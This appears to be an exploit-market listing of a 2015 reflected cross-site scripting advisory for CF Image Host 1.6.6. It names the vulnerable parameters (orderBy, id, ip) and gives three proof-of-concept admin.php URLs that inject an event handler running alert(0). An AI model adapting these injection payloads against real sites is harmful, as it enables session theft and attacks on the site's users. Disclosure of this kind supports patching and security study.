[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CF Image Host 1.6.6 Cross Site Scripting Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk Low
]
0day-ID
0day-ID-24550
Category
web applications
Date add
16-11-2015
Platform
php
CF Image Host 1.6.6 Cross Site Scripting Vulnerability

Vendor:
====================================
codefuture.co.uk/projects/imagehost


Product:
===================================
CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6


Vulnerability Details:
=====================

Multiple reflected XSS entry points exist allowing arbitrary client side
browser code execution on victims who click our infected linx. Undermining
the trust between the client and server, possibly leading to information
theft,
drop malware, steal session cookies etc...



XSS Exploit code(s):
===================

1)
http://localhost/imagehost1.6.6/admin.php?act=images&orderBy=%22%20onMouseMove=%22alert%280%29

2)
http://localhost/imagehost1.6.6/admin.php?act=edit&id=%22%20onMouseMove=%22alert%280%29


3)
http://localhost/imagehost1.6.6/admin.php?act=images&ip=%22%20onMouseMove=%22alert%280%29


Description:
=====================================================

Request Method(s):              [+] GET
Vulnerable Product:             [+] CF Image Host 1.65 - 1.6.6
Vulnerable Parameter(s):        [+] orderBy, id, ip

#  0day.today [2024-12-25]  #